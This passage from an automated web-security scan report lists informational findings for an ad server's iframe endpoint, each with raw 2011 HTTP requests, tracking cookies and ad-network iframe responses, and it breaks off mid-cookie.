GET /iframe3?5jBaAAKVGABxQIsAAAAAAB4aEgAAAAAAAAAAAAIAAAAAAAMABAADCFKvBAAAAAAANBEnAAAAAAA.8RgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWRQIAAAAAAAIAAwAAAAAAyHa-nxovB0AAAAAAAAAUQMh2vp8aLwdAAAAAAAAAFEDIdr6fGi8HQAAAAAAAABRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIyAayhvquCh0.RV9ZUkvbFGyuIJuMsVzWLN4xAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15rnestpp%2FM%3D787833.14445112.14291879.10366300%2FD%3Do_m_g%2FS%3D2115806991%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320358%2FL%3DwSplJmKIOPrpARpjTl.wjRuXMhd7ak5mFgYAAGQ5%2FB%3D.kJ3QtBDRmg-%2FJ%3D1315313158085814%2FK%3D8HRnHXMgH3x.FZViOHEasw%2FA%3D6261235%2FR%3D0%2F%2A%24,http%3A%2F%2Fomg.yahoo.com%2Fxhr%2Fad%2Flrec%2F2115806991%3Fref%3Dahr0cdovl3d3dy55ywhvby5jb20v%26token%3Db475da4881df940801d7698aa9d116ab,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445112%26Z%3D300x250%26_PVID%3DwSplJmKIOPrpARpjTl.wjRuXMhd7ak5mFgYAAGQ5%26_salt%3D2906618223%26cb%3D1315313158085814%26i%3D148950%26r%3D0,2b2a4ea2-d886-11e0-a8a4-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=wSplJmKIOPrpARpjTl.wjRuXMhd7ak5mFgYAAGQ5&ad_type=iframe&ad_size=300x250&site=148950&section_code=14445112&cb=1315313158085814&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rnestpp/M=787833.14445112.14291879.10366300/D=o_m_g/S=2115806991:LREC/Y=YAHOO/EXP=1315320358/L=wSplJmKIOPrpARpjTl.wjRuXMhd7ak5mFgYAAGQ5/B=.kJ3QtBDRmg-/J=1315313158085814/K=8HRnHXMgH3x.FZViOHEasw/A=6261235/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=fh'jT*YKlx8SkUq!79C8<4H$c; ih="b!!!!-!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; bh="b!!!#M!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4
J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; vuday1=@n$r!BKZI(BgvR-4M6Eq!79C8VY0tU; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G"; lifb=0EA2)A9.-BM5Jkn/>M1M.hWHO; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:45 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0402.rm.sp2
Set-Cookie: ih="b!!!!#!1n,b!!!!#=3f:!"; path=/; expires=Thu, 05-Sep-2013 12:46:45 GMT
Set-Cookie: vuday1=oyOxB!79C8GkUST; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f:!~~"; path=/; expires=Thu, 05-Sep-2013 12:46:45 GMT
Set-Cookie: liday1=8SkUp!79C8Jh]Hw; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:46:45 GMT
Pragma: no-cache
Content-Length: 1383
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9126001);}
</script><iframe name="turn_ad_call_frame" width="300" height="250" frameborder="0" src="http://ad.turn.com/server/ads.htm?&pub=2701141&code=17152424&cch=6872266&l=300x250&nonjs=1&sli=2560308&bli=1634623&exPub=59580&city=Dallas&acp=2.8980&rnd=1315313205&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGNUduSmkAQ%2EZlUHlKGmZ5hYFhrKgWK4gVRNN5etgaGhVUQComXv49ZtTZ5Sz%2E0Od1VfU53NdC2ZSVWQkwS65GK40i2gRKaxEYMDFq43W5TwjiASQC32M6Rtj1a9m3nMhsc7Y9wdOmmd3rPg0fh245tdzu90emGHzFx3MODajz8Z%2DjR%2El%2EorsLZ0%2DeG5%2Evcz9jrT3eDp93NffjuFy7ertzreDXTg%2D6m8Re93O9AFvRdPF7E%2Dnah9v5iWUz6k73%2EaS9aWdNULwileRnJXJO10q4yK0stLgs0H%2EQFsPqQHJuqQr4wuckp1UDXdQZAboRYwE1LA0wNg2KMuqJ8LV5TNBcEgHFsWBa8jEO3gzZiY3tBgNz1VAAFRgmmjKOxOM%2DrfFiMBsG0ruyw2i1y7bwLf639TJlyz4peurHt%2EowhR2j7IZ01Tjcs0u9oeJf5o8Uxvz1PRyPBvfDgrf3Uoxett12%2DB54rj2dkC4MYQChDocDo25fn1WWR%2EnXuJauRVCivkxh9rv%2DjTt6EzGocq%2EKUU0XVlbHrOTtFV7aLCD59bcp9chCRbjIldc5BvVk65hiUaVhcSksBGDL6DRcbt6o%3D%2C&url=http%3A%2F%2Fomg%2Eyahoo%2Ecom%2Fxhr%2Fad%2Flrec%2F2115806991%3Fref%3Dahr0cdovl3d3dy55ywhvby5jb20v%26token%3Db475da4881df940801d7698aa9d116ab" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...

15.40. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /iframe3?XKUDAHCNIABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTzbx8WfquCrkAQGF3mkTKtl2.WiYSu9rp2McYAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15q6ggjle%2FM%3D787833.14800347.14555521.14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F_ylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DY_rxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6454134%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26S%3D14800347%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D678154096%26cb%3D1315313105713897%26i%3D140509%26r%3D0%26ycg%3D%26yyob%3D%26zip%3D,10a407f8-d886-11e0-8bc2-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z&ad_type=iframe&ad_size=300x100&site=140509&section_code=14800347&cb=1315313105713897&zip=&ycg=&yyob=&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15q6ggjle/M=787833.14800347.14555521.14177427/D=sports/S=25664825:MREC/_ylt=AjV6qkbscsOrHRx5YKOYi005nYcB/Y=YAHOO/EXP=1315320305/L=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z/B=Y_rxAdBDRyg-/J=1315313105713897/K=r8awXcUkJHjbbi3QZybcoQ/A=6454134/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; ih="b!!!!,!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV5!!!!#=3f8^"; vuday1=BKZI(BgvR+4M6Eq!79C8LO3Y0; liday1=fh'jT*YKlx8SkUq!79C8<4H$c; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P
!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:24 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0077.rm.sp2
Set-Cookie: ih="b!!!!'!1-_1!!!!#=3f9$!2reF!!!!#=3f9'!4!0X!!!!#=3f9!!4A]T!!!!#=3f9#"; path=/; expires=Thu, 05-Sep-2013 12:45:24 GMT
Set-Cookie: vuday1=BgvR)!79C8gzv0u; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!!qrZ!!E)(!%L:B!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f9'=3p6,M.jTN"; path=/; expires=Thu, 05-Sep-2013 12:45:24 GMT
Set-Cookie: uid=uid=16caae16-d886-11e0-a615-78e7d15fc798&_hmacv=1&_salt=1081018325&_keyid=k1&_hmac=6089ab2e1c3124fdec5c84659be94e61053c31b3; path=/; expires=Thu, 06-Oct-2011 12:45:24 GMT
Set-Cookie: lifb=0EA2)D0!)KJ4EWf; path=/; expires=Fri, 09-Sep-2011 12:45:24 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:45:24 GMT
Pragma: no-cache
Content-Length: 1002
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9773674);}
</script><iframe src="http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1315313124&click=http://ads.bluelithium.com/clk?3,eAGlkEuPokAUhf.MrCYO9abKJrUoBFteKjZ2S28MD1sbcECgo86vHzKOZvZzNudLbu65uQcR44NkNMPiAwuEeEqwgQgmu4wJvOMjaBgGRmKMEeNwPNp4a0vNJnNHmSenWaub2sYN.6JSgXLuDJUKlTVx9a.B.8hLust9-n9u5e7j0HBwf0tj1J8uC8d8ZFv2OY7C8xzH1H8L6cKK-yCaVsEE0vgYXP0oo-9RXgbR63H-PC-Dx6KSo0PfN08A7Ks6TSotaXPtmhzqWsvqI3hxniViJ32.L6odCCQXXBCiISogJJQPwAZhNADinGIOLNk1ddt34EViputUYPYUrOwJ2F6rXqriVT-VaZd1i3a2urDYW8SfELKfcWaCWMZqtlgAe7OUiCBGMCSQAV9mdXPZvnnO0uaNWjVFVGnnInRFcMh5UrLjNLfVxN.-AqaMt-1F5aa1uu5.APcWM2RBxhERYw482YrkvMnWpTsr0vSThO.XNKtDoKROGUWEgpWE4Pu3ey23b.6p5De7gqfh," frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="100"></iframe>
...[SNIP]...

15.41. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7&ad_type=iframe&ad_size=300x250&site=224114&section_code=14486084&cb=1315312187399365&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15sa69po3/M=787833.14486084.14323910.12559432/D=allmyfr/S=360632246:LREC/Y=YAHOO/EXP=1315319387/L=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7/B=ejW9Ptj8el8-/J=1315312187399365/K=nql_VTEk0rLg6_ewKQ00GQ/A=6284639/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!(!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE"; bh="b!!!#C!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$